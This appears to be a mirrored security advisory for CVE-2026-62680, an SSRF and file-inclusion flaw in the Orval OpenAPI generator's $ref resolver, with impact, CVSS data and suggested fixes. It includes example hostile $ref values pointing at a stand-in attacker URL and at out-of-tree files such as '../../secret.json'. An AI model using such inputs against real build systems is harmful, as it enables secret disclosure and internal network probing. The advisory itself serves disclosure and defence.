highCVSS 7.1Vulnerability

CVE-2026-62680

### Summary Orval resolves OpenAPI `$ref`s by fetching remote `http(s)` URLs and reading local files (including absolute / out-of-tree paths), inlining the referenced schema into the generated client. Running `orval` on a spec whose `$ref` points at an attacker/internal URL or an arbitrary local file yields SSRF, remote file inclusion, and local file inclusion. Verified on 8.19.0. This is a different class from Orval's published output-injection CVEs (CVE-2026-22785/23947/24132/25141), none of which covers the `$ref` resolver. ### Details - `$ref: http://attacker/internal-evil.json#/...` → build host fetches (SSRF) and inlines the remote schema (RFI); confirmed property `REMOTE_ORVAL_PROP` in the generated client. - `$ref: /abs/path.json#/...` or `../../secret.json#/...` → out-of-tree local file read + inlined (LFI). No RCE: on 8.19.0 the description JSDoc is escaped (`*/`->`*\/`, the published fix), so `$ref` content cannot break out into code. The chain stops at SSRF + RFI + LFI. Fix: don't resolve remote `$ref`s by default (opt-in + host allowlist); confine local `$ref` resolution to the input directory tree (reject absolute paths and `../` escapes). ### PoC `reproduce.sh` attached: confirms LFI (out-of-tree read), SSRF (listener hit), RFI (remote schema inlined). Verified on Orval 8.19.0. ### Impact Build-time SSRF from the developer or CI host, disclosure of arbitrary local files, and inclusion of untrusted remote content, from running the generator on an attacker-controlled or attacker-influenced OpenAPI description. No code execution (output escaping is in place post the earlier fixes).

Properties

ghsa_id
GHSA-cxq5-97v7-87j8
severity
high
summary
Orval: Generation-time SSRF + remote/local file inclusion via unrestricted $ref
cvss_score
7.1
cve_id
CVE-2026-62680
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
is_ghsa_only
false
ghsa_published
2026-09-02T14:54:48Z
source_url
https://github.com/advisories/GHSA-cxq5-97v7-87j8
ghsa_updated
2026-09-02T14:54:50Z

Related Entities (6)

VULNERABLE_TO (1)

[Software]npm/orval

AFFECTS (1)

[Software]npm/orval

HAS_WEAKNESS (3)

[Weakness]Server-Side Request Forgery (SSRF)
[Weakness]Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[Weakness]Inclusion of Functionality from Untrusted Control Sphere

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-62680 (CVSS 7.1) — Ninja Signal Threat Intelligence | Ninja Signal